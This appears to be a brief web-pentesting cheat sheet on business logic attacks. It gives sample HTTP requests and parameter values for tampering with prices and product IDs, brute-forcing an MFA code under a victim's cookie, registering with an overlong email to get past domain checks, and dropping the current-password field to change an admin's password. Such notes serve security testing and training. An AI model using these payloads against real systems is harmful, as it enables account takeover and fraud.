Business Logic Attack

Business Logic is the part of the program that encodes the real-world business rules that determine how data can be created, stored, and changed.

Change Request Params to Unexpected Values

productId=-1
productId=a
productId=  # empty value

price=-1000
price=1000-
price=%1000
price=%-1000


Exploit Broken Two-Factor

Brute force a MFA Code

POST /login HTTP/1.1
Cookie: verify=victim
...

<!-- Brute force digits code -->
mfa-code=1111


Loop Back with 2,147,483,647

No contents yet.


Register with Too Long-Length Email Address

POST /register HTTP/1.1
...

username=attacker&password=pass1&email=aaaaaaaaaaaaa...aa@vulnerable.com.attacker.com


Remove the Specific POST Params

POST /change-password HTTP/1.1
...

<!-- Remove 'current-password' parameter -->
username=admin&new-password-1=newpass&new-password-2=newpass